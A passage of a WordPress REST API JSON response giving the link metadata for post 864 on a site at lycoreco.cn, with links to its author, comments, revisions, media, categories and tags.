\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/comments?post=864"}],"version-history":[{"count":4,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/864\/revisions"}],"predecessor-version":[{"id":939,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/864\/revisions\/939"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media\/892"}],"wp:attachment":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media?parent=864"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/categories?post=864"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/tags?post=864"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}